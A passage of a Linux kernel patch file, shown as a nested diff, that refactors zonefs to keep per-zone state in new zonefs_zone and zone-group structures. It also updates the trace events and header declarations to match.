+ 
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		if (sbi->s_nr_files[t])
+-			buf->f_files += sbi->s_nr_files[t] + 1;
++		if (sbi->s_zgroup[t].g_nr_zones)
++			buf->f_files += sbi->s_zgroup[t].g_nr_zones + 1;
+ 	}
+ 	buf->f_ffree = 0;
+ 
+@@ -1382,51 +513,85 @@ static int zonefs_parse_options(struct super_block *sb, char *options)
+ 		}
+ 	}
+ 
+-	return 0;
+-}
++	return 0;
++}
++
++static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
++		seq_puts(seq, ",errors=remount-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
++		seq_puts(seq, ",errors=zone-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
++		seq_puts(seq, ",errors=zone-offline");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
++		seq_puts(seq, ",errors=repair");
++
++	return 0;
++}
++
++static int zonefs_remount(struct super_block *sb, int *flags, char *data)
++{
++	sync_filesystem(sb);
++
++	return zonefs_parse_options(sb, data);
++}
++
++static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
++				struct dentry *dentry, struct iattr *iattr)
++{
++	struct inode *inode = d_inode(dentry);
++	int ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	ret = setattr_prepare(&init_user_ns, dentry, iattr);
++	if (ret)
++		return ret;
++
++	/*
++	 * Since files and directories cannot be created nor deleted, do not
++	 * allow setting any write attributes on the sub-directories grouping
++	 * files by zone type.
++	 */
++	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
++	    (iattr->ia_mode & 0222))
++		return -EPERM;
++
++	if (((iattr->ia_valid & ATTR_UID) &&
++	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
++	    ((iattr->ia_valid & ATTR_GID) &&
++	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
++		ret = dquot_transfer(mnt_userns, inode, iattr);
++		if (ret)
++			return ret;
++	}
+ 
+-static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
+-{
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++	if (iattr->ia_valid & ATTR_SIZE) {
++		ret = zonefs_file_truncate(inode, iattr->ia_size);
++		if (ret)
++			return ret;
++	}
+ 
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
+-		seq_puts(seq, ",errors=remount-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
+-		seq_puts(seq, ",errors=zone-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
+-		seq_puts(seq, ",errors=zone-offline");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
+-		seq_puts(seq, ",errors=repair");
++	setattr_copy(&init_user_ns, inode, iattr);
+ 
+ 	return 0;
+ }
+ 
+-static int zonefs_remount(struct super_block *sb, int *flags, char *data)
+-{
+-	sync_filesystem(sb);
+-
+-	return zonefs_parse_options(sb, data);
+-}
+-
+-static const struct super_operations zonefs_sops = {
+-	.alloc_inode	= zonefs_alloc_inode,
+-	.free_inode	= zonefs_free_inode,
+-	.statfs		= zonefs_statfs,
+-	.remount_fs	= zonefs_remount,
+-	.show_options	= zonefs_show_options,
+-};
+-
+ static const struct inode_operations zonefs_dir_inode_operations = {
+ 	.lookup		= simple_lookup,
+ 	.setattr	= zonefs_inode_setattr,
+ };
+ 
+ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+-				  enum zonefs_ztype type)
++				  enum zonefs_ztype ztype)
+ {
+ 	struct super_block *sb = parent->i_sb;
+ 
+-	inode->i_ino = bdev_nr_zones(sb->s_bdev) + type + 1;
++	inode->i_ino = bdev_nr_zones(sb->s_bdev) + ztype + 1;
+ 	inode_init_owner(&init_user_ns, inode, parent, S_IFDIR | 0555);
+ 	inode->i_op = &zonefs_dir_inode_operations;
+ 	inode->i_fop = &simple_dir_operations;
+@@ -1434,73 +599,38 @@ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+ 	inc_nlink(parent);
+ }
+ 
+-static int zonefs_init_file_inode(struct inode *inode, struct blk_zone *zone,
+-				  enum zonefs_ztype type)
++static const struct inode_operations zonefs_file_inode_operations = {
++	.setattr	= zonefs_inode_setattr,
++};
++
++static void zonefs_init_file_inode(struct inode *inode,
++				   struct zonefs_zone *z)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	inode->i_ino = zone->start >> sbi->s_zone_sectors_shift;
+-	inode->i_mode = S_IFREG | sbi->s_perm;
+-
+-	zi->i_ztype = type;
+-	zi->i_zsector = zone->start;
+-	zi->i_zone_size = zone->len << SECTOR_SHIFT;
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
+-	    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-		zonefs_err(sb,
+-			   "zone size %llu doesn't match device's zone sectors %llu\n",
+-			   zi->i_zone_size,
+-			   bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
+-		return -EINVAL;
+-	}
+ 
+-	zi->i_max_size = min_t(loff_t, MAX_LFS_FILESIZE,
+-			       zone->capacity << SECTOR_SHIFT);
+-	zi->i_wpoffset = zonefs_check_zone_condition(inode, zone, true, true);
++	inode->i_private = z;
+ 
++	inode->i_ino = z->z_sector >> sbi->s_zone_sectors_shift;
++	inode->i_mode = S_IFREG | sbi->s_perm;
+ 	inode->i_uid = sbi->s_uid;
+ 	inode->i_gid = sbi->s_gid;
+-	inode->i_size = zi->i_wpoffset;
+-	inode->i_blocks = zi->i_max_size >> SECTOR_SHIFT;
++	inode->i_size = z->z_wpoffset;
++	inode->i_blocks = z->z_capacity >> SECTOR_SHIFT;
+ 
+ 	inode->i_op = &zonefs_file_inode_operations;
+ 	inode->i_fop = &zonefs_file_operations;
+ 	inode->i_mapping->a_ops = &zonefs_file_aops;
+ 
+-	sb->s_maxbytes = max(zi->i_max_size, sb->s_maxbytes);
+-	sbi->s_blocks += zi->i_max_size >> sb->s_blocksize_bits;
+-	sbi->s_used_blocks += zi->i_wpoffset >> sb->s_blocksize_bits;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	/*
+-	 * For sequential zones, make sure that any open zone is closed first
+-	 * to ensure that the initial number of open zones is 0, in sync with
+-	 * the open zone accounting done when the mount option
+-	 * ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
+-	 */
+-	if (type == ZONEFS_ZTYPE_SEQ &&
+-	    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
+-	     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret)
+-			goto unlock;
+-	}
+-
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
++	/* Update the inode access rights depending on the zone condition */
++	z->z_flags |= ZONEFS_ZONE_INIT_MODE;
++	zonefs_inode_update_mode(inode);
+ }
+ 
+ static struct dentry *zonefs_create_inode(struct dentry *parent,
+-					const char *name, struct blk_zone *zone,
+-					enum zonefs_ztype type)
++					  const char *name,
++					  struct zonefs_zone *z,
++					  enum zonefs_ztype ztype)
+ {
+ 	struct inode *dir = d_inode(parent);
+ 	struct dentry *dentry;
+@@ -1516,15 +646,10 @@ static struct dentry *zonefs_create_inode(struct dentry *parent,
+ 		goto dput;
+ 
+ 	inode->i_ctime = inode->i_mtime = inode->i_atime = dir->i_ctime;
+-	if (zone) {
+-		ret = zonefs_init_file_inode(inode, zone, type);
+-		if (ret) {
+-			iput(inode);
+-			goto dput;
+-		}
+-	} else {
+-		zonefs_init_dir_inode(dir, inode, type);
+-	}
++	if (z)
++		zonefs_init_file_inode(inode, z);
++	else
++		zonefs_init_dir_inode(dir, inode, ztype);
+ 
+ 	d_add(dentry, inode);
+ 	dir->i_size++;
+@@ -1540,100 +665,51 @@ dput:
+ struct zonefs_zone_data {
+ 	struct super_block	*sb;
+ 	unsigned int		nr_zones[ZONEFS_ZTYPE_MAX];
++	sector_t		cnv_zone_start;
+ 	struct blk_zone		*zones;
+ };
+ 
+ /*
+- * Create a zone group and populate it with zone files.
++ * Create the inodes for a zone group.
+  */
+-static int zonefs_create_zgroup(struct zonefs_zone_data *zd,
+-				enum zonefs_ztype type)
++static int zonefs_create_zgroup_inodes(struct super_block *sb,
++				       enum zonefs_ztype ztype)
+ {
+-	struct super_block *sb = zd->sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct blk_zone *zone, *next, *end;
+-	const char *zgroup_name;
+-	char *file_name;
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
+ 	struct dentry *dir, *dent;
+-	unsigned int n = 0;
+-	int ret;
++	char *file_name;
++	int i, ret = 0;
++
++	if (!zgroup)
++		return -ENOMEM;
+ 
+ 	/* If the group is empty, there is nothing to do */
+-	if (!zd->nr_zones[type])
++	if (!zgroup->g_nr_zones)
+ 		return 0;
+ 
+ 	file_name = kmalloc(ZONEFS_NAME_MAX, GFP_KERNEL);
+ 	if (!file_name)
+ 		return -ENOMEM;
+ 
+-	if (type == ZONEFS_ZTYPE_CNV)
+-		zgroup_name = "cnv";
+-	else
+-		zgroup_name = "seq";
+-
+-	dir = zonefs_create_inode(sb->s_root, zgroup_name, NULL, type);
++	dir = zonefs_create_inode(sb->s_root, zonefs_zgroup_name(ztype),
++				  NULL, ztype);
+ 	if (IS_ERR(dir)) {
+ 		ret = PTR_ERR(dir);
+ 		goto free;
+ 	}
+ 
+-	/*
+-	 * The first zone contains the super block: skip it.
+-	 */
+-	end = zd->zones + bdev_nr_zones(sb->s_bdev);
+-	for (zone = &zd->zones[1]; zone < end; zone = next) {
+-
+-		next = zone + 1;
+-		if (zonefs_zone_type(zone) != type)
+-			continue;
+-
+-		/*
+-		 * For conventional zones, contiguous zones can be aggregated
+-		 * together to form larger files. Note that this overwrites the
+-		 * length of the first zone of the set of contiguous zones
+-		 * aggregated together. If one offline or read-only zone is
+-		 * found, assume that all zones aggregated have the same
+-		 * condition.
+-		 */
+-		if (type == ZONEFS_ZTYPE_CNV &&
+-		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-			for (; next < end; next++) {
+-				if (zonefs_zone_type(next) != type)
+-					break;
+-				zone->len += next->len;
+-				zone->capacity += next->capacity;
+-				if (next->cond == BLK_ZONE_COND_READONLY &&
+-				    zone->cond != BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_READONLY;
+-				else if (next->cond == BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_OFFLINE;
+-			}
+-			if (zone->capacity != zone->len) {
+-				zonefs_err(sb, "Invalid conventional zone capacity\n");
+-				ret = -EINVAL;
+-				goto free;
+-			}
+-		}
+-
+-		/*
+-		 * Use the file number within its group as file name.
+-		 */
+-		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", n);
+-		dent = zonefs_create_inode(dir, file_name, zone, type);
++	for (i = 0; i < zgroup->g_nr_zones; i++) {
++		/* Use the zone number within its group as the file name */
++		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", i);
++		dent = zonefs_create_inode(dir, file_name,
++					   &zgroup->g_zones[i], ztype);
+ 		if (IS_ERR(dent)) {
+ 			ret = PTR_ERR(dent);
+-			goto free;
++			break;
+ 		}
+-
+-		n++;
+ 	}
+ 
+-	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
+-		    zgroup_name, n, n > 1 ? "s" : "");
+-
+-	sbi->s_nr_files[type] = n;
+-	ret = 0;
+-
+ free:
+ 	kfree(file_name);
+ 
+@@ -1644,21 +720,38 @@ static int zonefs_get_zone_info_cb(struct blk_zone *zone, unsigned int idx,
+ 				   void *data)
+ {
+ 	struct zonefs_zone_data *zd = data;
++	struct super_block *sb = zd->sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++
++	/*
++	 * We do not care about the first zone: it contains the super block
++	 * and not exposed as a file.
++	 */
++	if (!idx)
++		return 0;
+ 
+ 	/*
+-	 * Count the number of usable zones: the first zone at index 0 contains
+-	 * the super block and is ignored.
++	 * Count the number of zones that will be exposed as files.
++	 * For sequential zones, we always have as many files as zones.
++	 * FOr conventional zones, the number of files depends on if we have
++	 * conventional zones aggregation enabled.
+ 	 */
+ 	switch (zone->type) {
+ 	case BLK_ZONE_TYPE_CONVENTIONAL:
+-		zone->wp = zone->start + zone->len;
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_CNV]++;
++		if (sbi->s_features & ZONEFS_F_AGGRCNV) {
++			/* One file per set of contiguous conventional zones */
++			if (!(sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones) ||
++			    zone->start != zd->cnv_zone_start)
++				sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++			zd->cnv_zone_start = zone->start + zone->len;
++		} else {
++			/* One file per zone */
++			sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++		}
+ 		break;
+ 	case BLK_ZONE_TYPE_SEQWRITE_REQ:
+ 	case BLK_ZONE_TYPE_SEQWRITE_PREF:
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_SEQ]++;
++		sbi->s_zgroup[ZONEFS_ZTYPE_SEQ].g_nr_zones++;
+ 		break;
+ 	default:
+ 		zonefs_err(zd->sb, "Unsupported zone type 0x%x\n",
+@@ -1698,11 +791,173 @@ static int zonefs_get_zone_info(struct zonefs_zone_data *zd)
+ 	return 0;
+ }
+ 
+-static inline void zonefs_cleanup_zone_info(struct zonefs_zone_data *zd)
++static inline void zonefs_free_zone_info(struct zonefs_zone_data *zd)
+ {
+ 	kvfree(zd->zones);
+ }
+ 
++/*
++ * Create a zone group and populate it with zone files.
++ */
++static int zonefs_init_zgroup(struct super_block *sb,
++			      struct zonefs_zone_data *zd,
++			      enum zonefs_ztype ztype)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
++	struct blk_zone *zone, *next, *end;
++	struct zonefs_zone *z;
++	unsigned int n = 0;
++	int ret;
++
++	/* Allocate the zone group. If it is empty, we have nothing to do. */
++	if (!zgroup->g_nr_zones)
++		return 0;
++
++	zgroup->g_zones = kvcalloc(zgroup->g_nr_zones,
++				   sizeof(struct zonefs_zone), GFP_KERNEL);
++	if (!zgroup->g_zones)
++		return -ENOMEM;
++
++	/*
++	 * Initialize the zone groups using the device zone information.
++	 * We always skip the first zone as it contains the super block
++	 * and is not use to back a file.
++	 */
++	end = zd->zones + bdev_nr_zones(sb->s_bdev);
++	for (zone = &zd->zones[1]; zone < end; zone = next) {
++
++		next = zone + 1;
++		if (zonefs_zone_type(zone) != ztype)
++			continue;
++
++		if (WARN_ON_ONCE(n >= zgroup->g_nr_zones))
++			return -EINVAL;
++
++		/*
++		 * For conventional zones, contiguous zones can be aggregated
++		 * together to form larger files. Note that this overwrites the
++		 * length of the first zone of the set of contiguous zones
++		 * aggregated together. If one offline or read-only zone is
++		 * found, assume that all zones aggregated have the same
++		 * condition.
++		 */
++		if (ztype == ZONEFS_ZTYPE_CNV &&
++		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			for (; next < end; next++) {
++				if (zonefs_zone_type(next) != ztype)
++					break;
++				zone->len += next->len;
++				zone->capacity += next->capacity;
++				if (next->cond == BLK_ZONE_COND_READONLY &&
++				    zone->cond != BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_READONLY;
++				else if (next->cond == BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_OFFLINE;
++			}
++		}
++
++		z = &zgroup->g_zones[n];
++		if (ztype == ZONEFS_ZTYPE_CNV)
++			z->z_flags |= ZONEFS_ZONE_CNV;
++		z->z_sector = zone->start;
++		z->z_size = zone->len << SECTOR_SHIFT;
++		if (z->z_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
++		    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			zonefs_err(sb,
++				"Invalid zone size %llu (device zone sectors %llu)\n",
++				z->z_size,
++				bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
++			return -EINVAL;
++		}
++
++		z->z_capacity = min_t(loff_t, MAX_LFS_FILESIZE,
++				      zone->capacity << SECTOR_SHIFT);
++		z->z_wpoffset = zonefs_check_zone_condition(sb, z, zone);
++
++		sb->s_maxbytes = max(z->z_capacity, sb->s_maxbytes);
++		sbi->s_blocks += z->z_capacity >> sb->s_blocksize_bits;
++		sbi->s_used_blocks += z->z_wpoffset >> sb->s_blocksize_bits;
++
++		/*
++		 * For sequential zones, make sure that any open zone is closed
++		 * first to ensure that the initial number of open zones is 0,
++		 * in sync with the open zone accounting done when the mount
++		 * option ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
++		 */
++		if (ztype == ZONEFS_ZTYPE_SEQ &&
++		    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
++		     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
++			ret = zonefs_zone_mgmt(sb, z, REQ_OP_ZONE_CLOSE);
++			if (ret)
++				return ret;
++		}
++
++		zonefs_account_active(sb, z);
++
++		n++;
++	}
++
++	if (WARN_ON_ONCE(n != zgroup->g_nr_zones))
++		return -EINVAL;
++
++	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
++		    zonefs_zgroup_name(ztype),
++		    zgroup->g_nr_zones,
++		    zgroup->g_nr_zones > 1 ? "s" : "");
++
++	return 0;
++}
++
++static void zonefs_free_zgroups(struct super_block *sb)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	enum zonefs_ztype ztype;
++
++	if (!sbi)
++		return;
++
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		kvfree(sbi->s_zgroup[ztype].g_zones);
++		sbi->s_zgroup[ztype].g_zones = NULL;
++	}
++}
++
++/*
++ * Create a zone group and populate it with zone files.
++ */
++static int zonefs_init_zgroups(struct super_block *sb)
++{
++	struct zonefs_zone_data zd;
++	enum zonefs_ztype ztype;
++	int ret;
++
++	/* First get the device zone information */
++	memset(&zd, 0, sizeof(struct zonefs_zone_data));
++	zd.sb = sb;
++	ret = zonefs_get_zone_info(&zd);
++	if (ret)
++		goto cleanup;
++
++	/* Allocate and initialize the zone groups */
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		ret = zonefs_init_zgroup(sb, &zd, ztype);
++		if (ret) {
++			zonefs_info(sb,
++				    "Zone group \"%s\" initialization failed\n",
++				    zonefs_zgroup_name(ztype));
++			break;
++		}
++	}
++
++cleanup:
++	zonefs_free_zone_info(&zd);
++	if (ret)
++		zonefs_free_zgroups(sb);
++
++	return ret;
++}
++
+ /*
+  * Read super block information from the device.
+  */
+@@ -1785,6 +1040,14 @@ free_page:
+ 	return ret;
+ }
+ 
++static const struct super_operations zonefs_sops = {
++	.alloc_inode	= zonefs_alloc_inode,
++	.free_inode	= zonefs_free_inode,
++	.statfs		= zonefs_statfs,
++	.remount_fs	= zonefs_remount,
++	.show_options	= zonefs_show_options,
++};
++
+ /*
+  * Check that the device is zoned. If it is, get the list of zones and create
+  * sub-directories and files according to the device zone configuration and
+@@ -1792,7 +1055,6 @@ free_page:
+  */
+ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ {
+-	struct zonefs_zone_data zd;
+ 	struct zonefs_sb_info *sbi;
+ 	struct inode *inode;
+ 	enum zonefs_ztype t;
+@@ -1845,16 +1107,6 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 	if (ret)
+ 		return ret;
+ 
+-	memset(&zd, 0, sizeof(struct zonefs_zone_data));
+-	zd.sb = sb;
+-	ret = zonefs_get_zone_info(&zd);
+-	if (ret)
+-		goto cleanup;
+-
+-	ret = zonefs_sysfs_register(sb);
+-	if (ret)
+-		goto cleanup;
+-
+ 	zonefs_info(sb, "Mounting %u zones", bdev_nr_zones(sb->s_bdev));
+ 
+ 	if (!sbi->s_max_wro_seq_files &&
+@@ -1865,6 +1117,11 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 		sbi->s_mount_opts &= ~ZONEFS_MNTOPT_EXPLICIT_OPEN;
+ 	}
+ 
++	/* Initialize the zone groups */
++	ret = zonefs_init_zgroups(sb);
++	if (ret)
++		goto cleanup;
++
+ 	/* Create root directory inode */
+ 	ret = -ENOMEM;
+ 	inode = new_inode(sb);
+@@ -1884,13 +1141,19 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 
+ 	/* Create and populate files in zone groups directories */
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		ret = zonefs_create_zgroup(&zd, t);
++		ret = zonefs_create_zgroup_inodes(sb, t);
+ 		if (ret)
+-			break;
++			goto cleanup;
+ 	}
+ 
++	ret = zonefs_sysfs_register(sb);
++	if (ret)
++		goto cleanup;
++
++	return 0;
++
+ cleanup:
+-	zonefs_cleanup_zone_info(&zd);
++	zonefs_free_zgroups(sb);
+ 
+ 	return ret;
+ }
+@@ -1909,6 +1172,7 @@ static void zonefs_kill_super(struct super_block *sb)
+ 		d_genocide(sb->s_root);
+ 
+ 	zonefs_sysfs_unregister(sb);
++	zonefs_free_zgroups(sb);
+ 	kill_block_super(sb);
+ 	kfree(sbi);
+ }
+diff --git a/fs/zonefs/trace.h b/fs/zonefs/trace.h
+index 42edcfd393ed2..9969db3a9c7dc 100644
+--- a/fs/zonefs/trace.h
++++ b/fs/zonefs/trace.h
+@@ -20,8 +20,9 @@
+ #define show_dev(dev) MAJOR(dev), MINOR(dev)
+ 
+ TRACE_EVENT(zonefs_zone_mgmt,
+-	    TP_PROTO(struct inode *inode, enum req_op op),
+-	    TP_ARGS(inode, op),
++	    TP_PROTO(struct super_block *sb, struct zonefs_zone *z,
++		     enum req_op op),
++	    TP_ARGS(sb, z, op),
+ 	    TP_STRUCT__entry(
+ 			     __field(dev_t, dev)
+ 			     __field(ino_t, ino)
+@@ -30,12 +31,12 @@ TRACE_EVENT(zonefs_zone_mgmt,
+ 			     __field(sector_t, nr_sectors)
+ 	    ),
+ 	    TP_fast_assign(
+-			   __entry->dev = inode->i_sb->s_dev;
+-			   __entry->ino = inode->i_ino;
++			   __entry->dev = sb->s_dev;
++			   __entry->ino =
++				z->z_sector >> ZONEFS_SB(sb)->s_zone_sectors_shift;
+ 			   __entry->op = op;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
+-			   __entry->nr_sectors =
+-				   ZONEFS_I(inode)->i_zone_size >> SECTOR_SHIFT;
++			   __entry->sector = z->z_sector;
++			   __entry->nr_sectors = z->z_size >> SECTOR_SHIFT;
+ 	    ),
+ 	    TP_printk("bdev=(%d,%d), ino=%lu op=%s, sector=%llu, nr_sectors=%llu",
+ 		      show_dev(__entry->dev), (unsigned long)__entry->ino,
+@@ -58,9 +59,10 @@ TRACE_EVENT(zonefs_file_dio_append,
+ 	    TP_fast_assign(
+ 			   __entry->dev = inode->i_sb->s_dev;
+ 			   __entry->ino = inode->i_ino;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
++			   __entry->sector = zonefs_inode_zone(inode)->z_sector;
+ 			   __entry->size = size;
+-			   __entry->wpoffset = ZONEFS_I(inode)->i_wpoffset;
++			   __entry->wpoffset =
++				zonefs_inode_zone(inode)->z_wpoffset;
+ 			   __entry->ret = ret;
+ 	    ),
+ 	    TP_printk("bdev=(%d, %d), ino=%lu, sector=%llu, size=%zu, wpoffset=%llu, ret=%zu",
+diff --git a/fs/zonefs/zonefs.h b/fs/zonefs/zonefs.h
+index 1dbe78119ff16..2d626e18b1411 100644
+--- a/fs/zonefs/zonefs.h
++++ b/fs/zonefs/zonefs.h
+@@ -39,31 +39,47 @@ static inline enum zonefs_ztype zonefs_zone_type(struct blk_zone *zone)
+ 	return ZONEFS_ZTYPE_SEQ;
+ }
+ 
+-#define ZONEFS_ZONE_OPEN	(1U << 0)
+-#define ZONEFS_ZONE_ACTIVE	(1U << 1)
+-#define ZONEFS_ZONE_OFFLINE	(1U << 2)
+-#define ZONEFS_ZONE_READONLY	(1U << 3)
++#define ZONEFS_ZONE_INIT_MODE	(1U << 0)
++#define ZONEFS_ZONE_OPEN	(1U << 1)
++#define ZONEFS_ZONE_ACTIVE	(1U << 2)
++#define ZONEFS_ZONE_OFFLINE	(1U << 3)
++#define ZONEFS_ZONE_READONLY	(1U << 4)
++#define ZONEFS_ZONE_CNV		(1U << 31)
+ 
+ /*
+- * In-memory inode data.
++ * In-memory per-file inode zone data.
+  */
+-struct zonefs_inode_info {
+-	struct inode		i_vnode;
++struct zonefs_zone {
++	/* Zone state flags */
++	unsigned int		z_flags;
+ 
+-	/* File zone type */
+-	enum zonefs_ztype	i_ztype;
++	/* Zone start sector (512B unit) */
++	sector_t		z_sector;
+ 
+-	/* File zone start sector (512B unit) */
+-	sector_t		i_zsector;
++	/* Zone size (bytes) */
++	loff_t			z_size;
+ 
+-	/* File zone write pointer position (sequential zones only) */
+-	loff_t			i_wpoffset;
++	/* Zone capacity (file maximum size, bytes) */
++	loff_t			z_capacity;
+ 
+-	/* File maximum size */
+-	loff_t			i_max_size;
++	/* Write pointer offset in the zone (sequential zones only, bytes) */
++	loff_t			z_wpoffset;
++};
+ 
+-	/* File zone size */
+-	loff_t			i_zone_size;
++/*
++ * In memory zone group information: all zones of a group are exposed
++ * as files, one file per zone.
++ */
++struct zonefs_zone_group {
++	unsigned int		g_nr_zones;
++	struct zonefs_zone	*g_zones;
++};
++
++/*
++ * In-memory inode data.
++ */
++struct zonefs_inode_info {
++	struct inode		i_vnode;
+ 
+ 	/*
+ 	 * To serialise fully against both syscall and mmap based IO and
+@@ -82,7 +98,6 @@ struct zonefs_inode_info {
+ 
+ 	/* guarded by i_truncate_mutex */
+ 	unsigned int		i_wr_refcnt;
+-	unsigned int		i_flags;
+ };
+ 
+ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+@@ -90,6 +105,31 @@ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+ 	return container_of(inode, struct zonefs_inode_info, i_vnode);
+ }
+ 
++static inline bool zonefs_zone_is_cnv(struct zonefs_zone *z)
++{
++	return z->z_flags & ZONEFS_ZONE_CNV;
++}
++
++static inline bool zonefs_zone_is_seq(struct zonefs_zone *z)
++{
++	return !zonefs_zone_is_cnv(z);
++}
++
++static inline struct zonefs_zone *zonefs_inode_zone(struct inode *inode)
++{
++	return inode->i_private;
++}
++
++static inline bool zonefs_inode_is_cnv(struct inode *inode)
++{
++	return zonefs_zone_is_cnv(zonefs_inode_zone(inode));
++}
++
++static inline bool zonefs_inode_is_seq(struct inode *inode)
++{
++	return zonefs_zone_is_seq(zonefs_inode_zone(inode));
++}
++
+ /*
+  * On-disk super block (block 0).
+  */
+@@ -181,7 +221,7 @@ struct zonefs_sb_info {
+ 	uuid_t			s_uuid;
+ 	unsigned int		s_zone_sectors_shift;
+ 
+-	unsigned int		s_nr_files[ZONEFS_ZTYPE_MAX];
++	struct zonefs_zone_group s_zgroup[ZONEFS_ZTYPE_MAX];
+ 
+ 	loff_t			s_blocks;
+ 	loff_t			s_used_blocks;
+@@ -209,6 +249,28 @@ static inline struct zonefs_sb_info *ZONEFS_SB(struct super_block *sb)
+ #define zonefs_warn(sb, format, args...)	\
+ 	pr_warn("zonefs (%s) WARNING: " format, sb->s_id, ## args)
+ 
++/* In super.c */
++void zonefs_inode_account_active(struct inode *inode);
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op);
++void zonefs_i_size_write(struct inode *inode, loff_t isize);
++void zonefs_update_stats(struct inode *inode, loff_t new_isize);
++void __zonefs_io_error(struct inode *inode, bool write);
++
++static inline void zonefs_io_error(struct inode *inode, bool write)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	mutex_lock(&zi->i_truncate_mutex);
++	__zonefs_io_error(inode, write);
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++/* In file.c */
++extern const struct address_space_operations zonefs_file_aops;
++extern const struct file_operations zonefs_file_operations;
++int zonefs_file_truncate(struct inode *inode, loff_t isize);
++
++/* In sysfs.c */
+ int zonefs_sysfs_register(struct super_block *sb);
+ void zonefs_sysfs_unregister(struct super_block *sb);
+ int zonefs_sysfs_init(void);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index 0584e9f6e3397..57acb895c0381 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -657,6 +657,7 @@ static inline bool acpi_quirk_skip_acpi_ac_and_battery(void)
+ #if IS_ENABLED(CONFIG_X86_ANDROID_TABLETS)
+ bool acpi_quirk_skip_i2c_client_enumeration(struct acpi_device *adev);
+ int acpi_quirk_skip_serdev_enumeration(struct device *controller_parent, bool *skip);
++bool acpi_quirk_skip_gpio_event_handlers(void);
+ #else
+ static inline bool acpi_quirk_skip_i2c_client_enumeration(struct acpi_device *adev)
+ {
